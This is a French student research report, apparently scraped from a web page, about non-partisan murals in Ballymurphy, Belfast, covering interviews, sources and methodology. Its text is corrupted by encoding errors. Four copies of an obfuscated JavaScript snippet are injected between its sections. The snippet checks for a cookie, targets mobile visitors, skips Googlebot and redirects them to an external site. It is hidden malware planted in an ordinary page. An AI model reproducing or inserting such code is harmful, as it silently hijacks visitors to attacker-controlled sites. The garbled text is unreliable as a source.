Analyse: Gardant en tA?te le fait que ce genre de discours est typique da��un agent politique et pourrait A�ventuellement figurer dans sa campagne, nous pouvons tout de mA?me dire que cette diversitA� a une chance de promouvoir les murals non-partisans dans la rA�gion de Ballymurphy. De plus, nous avons pu observer, en voyant notre interviewA� interagir avec des passants, qua��il est effectivement proche de sa communautA�, et de par son attitude familiA?re lors de notre entretien, nous pouvons dire sans trop nous avancer qua��il est fortement investi dans son domaine politique.

[1]A�HousingExclusive (18 dA�cembre 2013), Art project has super impact on community spirit, [En ligne] URL:A�http://www.nihe.gov.uk/news-art-project-has-super-impact-on-community-spirit

[2]A�Beyond the Walls (2012), Olympic Medal Winners, [En ligne] URL:A�http://beyondthewallsthefilm.com/portfolio/arabeh-prisoner-mural/

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Bibliographie commentA�e

Cette vidA�o-reportage nommA�e a�?Olympics medal winnersa�?, en rA�fA�rence au mural rA�alisA�e par Danny Devenny, Mark Ervine, Marty Lyons et Liam MacGabhann, parle du fait que depuis les accords de paix, les peintres de murals loyalistes et rA�publicains travaillent ensemble. Depuis la fin du conflit, la moyenne de suicides des jeunes a augmentA� et la consommation de drogue aussi. Les artistes tentent da��aider ces jeunes en difficultA� avec la crA�ation de murals tels que celui sur les Jeux Olympiques, crA�A� en 2012, lorsque ceux-ci se dA�roulaient A� Londres.

  • CURRAN Barry, MATIER Philip (17 janvier 2010), A�Paint for peaceA�, in Northern Visions NvTv Vimeo, [En ligne] URL:A�https://vimeo.com/8795619, consultA� le 06.01.2016.

Ca��est une vidA�o reportage nommA�e a�?Paint for Peacea�? publiA�e par la chaA�ne de Northern Visions NvTvPRO sur Vimeo. Ce reportage nous parle de deux peintres de murals de deux bords politiques opposA�s, Danny Devanney (rA�publicain et peintre du mur des super-hA�ros) et Mark Ervine (loyaliste) qui vont travailler ensemble et apporter une vision positive du futur grA?ce A� leur art. De cette rencontre va naA�tre une amitiA� oA? il na��est plus influencA�e par le milieu de provenance de chacun.

Le Housing Executive A� A�tA� impliquA� dans la crA�ation du mur des super-hA�ros. Ce site nous explique en quoi il consiste; il est prA�sentA� comme A�tant la��autoritA� de la stratA�gie de logement de la��Irlande du Nord A�tablie en 1971, offrant des services sociaux de rente. Cet organisme sa��occupe da��environ 90a��000 logements dans le Nord de la��Irlande. Ce qui est intA�ressant est que cette organisation sa��est impliquA�e dans le mur des super-hA�ros alors qua��elle est orientA�e sur les logements. On peut en dA�duire qua��elle estime que le mur des super-hA�ros est un A�lA�ment positif dans le dA�cor urbain, et donc que cela peut inciter les gens A� emmA�nager dans ce quartier.

Ca��est dans cet article que nous avons trouvA� le nom de la��artiste, Danny Devanney, qui a peint le mur des super-hA�ros, ainsi que ses commanditaires, Building Relationships in Communities (BRIC), et les associations en soutien du projet: the Housing Executive Sliabh Dubh Residents Association, the Fold Housing Association, the Black Mountain Shared Spaces Project et the Upper Springfield Development Forum. Il nous informe aussi que ce mural attire beaucoup la��attention. Cet article nous a A�tA� capital pour commenter notre problA�matique.

Cet article parle de l’inauguration du mur Olympic medal winner, mentionnant le fait que a�?cette fois A�a na��a rien a voir avec la politiquea�?. Cet article nous intA�resse car ce mural a, comme celui des super-hA�ros, A�tA� peint pour A�gailler le tajet des enfants se rendant A� la��A�cole.

Cet article explique la��European Peace III Programme, figurant sur la plaque dA�couverte sur la fresque des super-hA�ros, nous apprenant par exemple que le nom entier du programme est a�?EU Programme for Peace and Reconciliation in Northern Ireland and the Border Region of Irelanda�? et qua��il est donc intA�ressant pour notre problA�matique.

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

MA�thodologie

Notre but principal A�tait de rA�colter des donnA�es provenant da��acteurs portant un point de vue diffA�rent sur notre sujet da��A�tude et sur notre problA�matique de la��art non partisan. Pour ce faire, nous avons abordA� notre sujet en trois temps: nous avons analysA� le mural avec une perspective de chercheuses, avons interrogA� des passants dans la rue en espA�rant rencontrer des locaux, et avons finalement interviewA� un acteur administratif.

AprA?s nos mesures et notre constatation de la��atmosphA?re du lieu, nous avons posA� des questions liA�es A� la��opinion des passants en ce qui concerne la peinture du mur, tout comme leurs impressions sur la��impact que sa rA�alisation a eu sur la communautA� du quartier. A�

Bien plus tard, en analysant nos rA�sultats, nous nous sommes rendues compte que la��une de nos questions A�tait biaisA�e et influenA�ait probablement la rA�ponse donnA�e, A�tant donnA� qua��on demandait explicitement si la peinture du mural avait renforcA� la cohA�sion du quartier.

Nous avions A�galement prA�vu un entretien avec un acteur impliquA� dans le projet de la rA�alisation du mural. Notre choix sa��est da��abord portA� sur la��artiste du mur, Danny Devenney, mais nous avons dA�cidA� de ne pas attendre sa rA�ponse et de contacter da��autres acteurs, avec qui une discussion aurait A�tA� tout autant intA�ressante.

Nous avons donc contactA� le maire de Belfast et le Housing Executive, avec la��idA�e qua��ils pourraient nous renseigner sur les questions de la��impact collectif de la fresque. Nous avons reA�u des rA�ponses assez rapidement, et avons A�tA� redirigA�es par le maire vers le conseiller municipal Steven Corr. Malheureusement, le temps A� disposition ne nous permettait de conduire un entretien qua��avec un seul de ces acteurs, ca��est pourquoi notre choix sa��est portA� sur le conseiller, car nous avons A�valuA� le fait que son point de vue sur la question serait plus riche que celui da��une association.

Steven Corr fait partie de la communautA� catholique de Belfast et est en charge de la rA�gion de Ballymurphy, comprenant la rue oA? se trouve notre mural des super-hA�ros. Il est membre du Sinn Fein, un parti de gauche rA�publicain, a fait ses A�tudes en histoire et en politique A� la��universitA� de Queena��s. Il a vA�cu un temps A� Londres avant de revenir A� Belfast.

Lors de cet entretien, nous avons A�tA� prises de cours avec la��A�ventualitA� de faire un tour en voiture avec le conseiller; opportunitA� que nous avons immA�diatement saisie, sacrifiant volontairement notre idA�e de la��enregistrer au profit da��une expA�rience sa��annonA�ant enrichissante. La prise de notes sa��est donc avA�rA�e une mA�thode plus adaptA�e A� la situation. Nous nous sommes faites prA�senter une grande partie des murals de la rA�gion, apprenant A�de ce fait des dA�tails intA�ressants, parfois en lien avec notre fresque et parfois non.
En rA�sumA�, nous avons obtenu des clarifications sur les projets en cours dans la rA�gion de Ballymurphy et les politiques mises en place A� Belfast au sujet de la��art non partisan, qui est la��intA�rA?t principal de notre A�tude.

Si la��expA�rience A�tait A� refaire, nous nous prA�parerions A� toutes les A�ventualitA�s, comme un entretien ne se passant pas tout A� fait comme prA�vu. AprA?s rA�flexion, nous avons tout de mA?me convenu que nous avions sA�rement manquA� de prA�cision dans nos attentes pour cet entretien, mais nous sommes tout de mA?me satisfaites des rA�sultats obtenus.

En somme, la mA�thode choisie pour aborder notre sujet sur place nous a permis de rA�colter beaucoup da��informations tirA�es de sources diffA�rentes et ainsi pouvoir les comparer en recherchant des cohA�rences ou incohA�rences suivant la provenance du discours analysA�.

Nous avons A�galement estimA� que le mural des super-hA�ros en lui-mA?me mA�ritait une analyse da��image dA�taillA�e. Cette analyse est une interprA�tation de notre part basA�e sur la��image en tant que telle, nos connaissances en histoire de la��art, celles du contexte belfastois, ainsi que de celles des personnages reprA�sentA�s. Nous na��avons pas obtenu da��informations iconographiques de la part de la��artiste ou des initiateurs de la fresque, et donc, notre analyse du mural en question tient da��avantage de l’hypothA?se que de la rA�alitA� et mA�riterait une recherche plus approfondie, et de prA�fA�rence par le biais da��un entretien avec la��artiste.

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

ElA�ments rA�publicains

Vous trouverez ici les divers A�lA�ments rA�publicains que nous allons analyser, ainsi que leur lien (ou non) avec les conflits A� l’international:

  • Murals de la��International Wall
    ElA�ments internationaux trA?s prA�sents, nous nous focaliserons particuliA?rement sur une mural palestinienne (deux mains en prison se rejoignant) ainsi qua��une mural basque (concernant Otegi), dont nous analyserons les symboliques et les messages.
  • Articles exposA�s au Republican Irish History Museum faisant rA�fA�rence aux conflits internationaux
    Symbolique et provenance des A�lA�ments exposA�s, ainsi que leur situation spatiale dans le musA�e.
  • Magasin A� Sinn Fein A� A� Falls
    Symbolique des objets vendus en rapports avec des conflits internationaux. Analyse de la��interview des personnes prA�sentent dans le magasin, de son inventaire, ainsi que de la faA�ade du magasin.
  • Magasin A� Republican Sinn Fein A� A� Falls
    Symbolique des objets vendus en rapports avec des conflits internationaux et leur provenance. Analyse de la��interview des personnes prA�sentent dans le magasin, de son inventaire, ainsi que de la faA�ade du magasin.
  • Magasin A� Ceiliur an Choilm A� A� Falls
    Symbolique des objets vendus en rapports avec des conflits internationaux et leur provenance. Analyse de la��interview des personnes prA�sentent dans le magasin, de son inventaire, ainsi que de la faA�ade du magasin.
  • Journal propagandiste achetA� au Republican Sinn Fein et auA�Ceiliur an Choilm
    Attention portA�e aux auteurs, leurs nationalitA�s, les articles portant sur des conflits internationaux (dans quelle proportion et quels conflits), les dates, le lieu de publication etc. (dans la mesure des A�lA�ments disponibles). Tout indice nous permettant de dA�celer la��importance des conflits internationaux dans le journal.
ElA�ments loyalistes
Retour A� la page « SolidaritA� Internationale »

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}